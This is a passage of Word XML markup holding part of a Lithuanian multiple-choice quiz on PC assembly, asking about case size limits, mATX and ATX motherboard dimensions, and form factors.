      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> atkreipti dėmesį į </w:t>
      </w:r>
      <w:r w:rsidR="002706A1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>šiuos</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1D09CF57" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>orpus</w:t>
      </w:r>
      <w:r w:rsidR="27A337F5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>o apribojimus</w:t>
      </w:r>
      <w:r w:rsidR="002706A1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002706A1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pažymėkite tinkamą atsakymą</w:t>
      </w:r>
      <w:r w:rsidR="00FB2EDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0578BB80" w14:textId="67BBF9A0" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="4874243D" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="298F1746" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>aksimalus procesoriaus aušintuvo aukštis, maksimalus vaizdo plokštės plotis, maksimalus procesoriaus aušintuvo aukštis</w:t>
      </w:r>
      <w:r w:rsidR="259FFEAA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BDE0DD" w14:textId="2A0344C9" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="79FB1356" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="298F1746" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>aksimalus procesoriaus aušintuvo plotis, maksimalus vaizdo plokštės ilgis, maksimalus procesoriaus aušintuvo aukštis</w:t>
      </w:r>
      <w:r w:rsidR="654559DE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26683D14" w14:textId="5C372A9B" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="5EDB8AC5" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="298F1746" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>aksimalus procesoriaus aušintuvo aukštis, maksimalus vaizdo plokštės ilgis, maksimalus procesoriaus aušintuvo aukštis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FBE3FD" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65660B78" w14:textId="61B0D207" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>7. Kok</w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>pagrindinės plokštės mATX formos faktori</w:t>
      </w:r>
      <w:r w:rsidR="0F242A3B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>aus dydis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pažymėkite teisingą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D2DB08" w14:textId="79C0F8A0" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>(170 × 170 mm)</w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32296C9E" w14:textId="7B0F1E16" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(244 × 244, 244 × 225 arba 191 × 188 mm)</w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A38B167" w14:textId="0E023DE3" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>(305 × 244, 305 × 225 arba 305 × 199 mm</w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFAAB9C" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FD89D46" w14:textId="6834FCE7" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r w:rsidR="5BABC600" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Koks pagrindinės plokštės ATX formos faktoriaus dydis?</w:t>
      </w:r>
      <w:r w:rsidR="0024358D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="12" w:name="_Hlk67742292"/>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pažymėkite teisingą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atsakymą.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="4825239C" w14:textId="5C801630" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>(244 × 244, 244 × 225 arba 191 × 188 mm)</w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D3E48C" w14:textId="38E00934" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>(305 × 330 mm)</w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F3B6A4" w14:textId="05CDDA99" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>(305 × 244, 305 × 225 arba 305 × 199 mm)</w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB254A5" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06661816" w14:textId="289DD66F" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>9. Kur</w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ioje </w:t>
      </w:r>
      <w:r w:rsidR="009613BD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>kompiuterio</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>vietoje</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>visada nurodomas formos faktorius? Pasirinkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B6BBD1" w14:textId="0BE2816A" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00D83813" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>orpuse ir pagrindinėje plokštėje;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5000C4" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Maitinimo bloke ir aušintuve;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3A2FBF" w14:textId="67C098FF" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Pagrindinėje plokštėje</w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1946BCB5" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49C22B38" w14:textId="01A7349B" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">10. </w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Pratęskite teiginį</w:t>
      </w:r>
      <w:r w:rsidR="669A2D8E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="009613BD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00FB2EDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Prieš montuojant pagrindinę plokštę į korpusą reikia įmontuoti</w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:r w:rsidR="00FB2EDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
